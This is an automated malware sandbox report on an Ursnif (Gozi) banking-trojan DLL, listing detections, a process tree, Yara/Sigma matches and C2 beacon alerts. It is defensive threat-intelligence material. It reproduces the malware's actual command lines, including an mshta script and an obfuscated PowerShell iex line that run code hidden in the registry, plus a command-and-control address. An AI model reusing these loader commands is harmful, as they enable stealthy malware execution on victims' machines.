
Windows Analysis Report status.dll

Overview

General Information

Sample Name: status.dll
Analysis ID: 555803
MD5: 947fe47db34a2654fc7aa76ec2bebec0
SHA1: 6e2d76945861c48a2e4552d87583c1a70e6525a2
SHA256: 02bb7e5eda106943c37400103a651d11d1ebfd5f4b0a550874328c2c82340923
Tags: exe, gozi, italy, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Maps a DLL or memory area into another process
Writes to foreign memory regions
Sigma detected: Suspicious MSHTA Process Patterns
Writes or reads registry keys via WMI
Machine Learning detection for sample
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious Rundll32 Activity
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Registers a DLL
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5624 cmdline: loaddll32.exe "C:\Users\user\Desktop\status.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 4792 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\status.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5268 cmdline: rundll32.exe "C:\Users\user\Desktop\status.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • mshta.exe (PID: 6100 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
          • powershell.exe (PID: 2176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
            • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • csc.exe (PID: 3176 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
              • cvtres.exe (PID: 4960 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D3C.tmp" "c:\Users\user\AppData\Local\Temp\fyriofhk\CSC7F089C7BD9A5426483691E56FD9DB0F7.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
            • csc.exe (PID: 3860 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
    • regsvr32.exe (PID: 2944 cmdline: regsvr32.exe /s C:\Users\user\Desktop\status.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • mshta.exe (PID: 2948 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
        • powershell.exe (PID: 1676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
          • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • csc.exe (PID: 6548 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
            • cvtres.exe (PID: 6612 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES522D.tmp" "c:\Users\user\AppData\Local\Temp\yycrjy0w\CSCDAC2BC21A294475B86B2FDF784B11415.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
          • csc.exe (PID: 6852 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
    • rundll32.exe (PID: 5784 cmdline: rundll32.exe C:\Users\user\Desktop\status.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • mshta.exe (PID: 6304 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
        • powershell.exe (PID: 5008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
          • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • csc.exe (PID: 3396 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
            • cvtres.exe (PID: 6688 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES49B1.tmp" "c:\Users\user\AppData\Local\Temp\5nzflxas\CSCCA0D8D115C84DA1A0293F6BF85846.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
          • csc.exe (PID: 2952 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
      • control.exe (PID: 6328 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
        • rundll32.exe (PID: 6236 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • mshta.exe (PID: 620 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
      • powershell.exe (PID: 6944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • csc.exe (PID: 6072 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
          • cvtres.exe (PID: 2932 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4702.tmp" "c:\Users\user\AppData\Local\Temp\eutk2hxp\CSC3C520F3552234BD5981E8C2C19975E5B.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
        • csc.exe (PID: 3672 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
          • cvtres.exe (PID: 2464 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67D8.tmp" "c:\Users\user\AppData\Local\Temp\babtdr3v\CSC990A060DA8974A64BF3BB68C9993246.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
    • control.exe (PID: 6672 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • iexplore.exe (PID: 3608 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5880 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 2132 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5828 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82956 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5272 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17430 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 7100 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82992 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(34 entries in total; the first 5 are shown)

Sigma Overview

System Summary:

Sigma detected: Suspicious MSHTA Process Patterns
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, CommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\status.dll,DllRegisterServer, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 5784, ProcessCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ProcessId: 6304
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6304, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 5008
Sigma detected: Suspicious Call by Ordinal
Source: Process started; Author: Florian Roth; Data: Command: rundll32.exe "C:\Users\user\Desktop\status.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\status.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\status.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4792, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\status.dll",#1, ProcessId: 5268
Sigma detected: Mshta Spawning Windows Shell
Source: Process started; Author: Florian Roth; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6304, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 5008
Sigma detected: Suspicious Rundll32 Activity
Source: Process started; Author: juju4, Jonhnathan Ribeiro, oscd.community; Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6328, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 6236
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6944, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline, ProcessId: 6072
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6304, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 5008
Sigma detected: T1086 PowerShell Execution
Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132870954423619360.5008.DefaultAppDomain.powershell

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: status.dll; ReversingLabs: Detection: 23%
Machine Learning detection for sample
Source: status.dll; Joe Sandbox ML: detected
Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_017D4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 4_2_02D44872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 5_2_04AA4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_00AC4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: status.dll; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe; File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.407600031.0000000005070000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.432953884.0000000005E00000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.432954394.00000000064C0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.402949570.0000000005AD0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.407600031.0000000005070000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.432953884.0000000005E00000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.432954394.00000000064C0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.402949570.0000000005AD0000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_03B08B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_03B10219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_03B016BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 4_2_048E16BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 4_2_048F0219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 4_2_048E8B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 5_2_059116BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 5_2_05918B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 5_2_05920219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_009A0219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_00998B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_009916BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_03B08F03 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49748 -> 31.41.44.3:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49751 -> 31.41.44.3:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49751 -> 31.41.44.3:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 31.41.44.3:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49754 -> 31.41.44.3:80
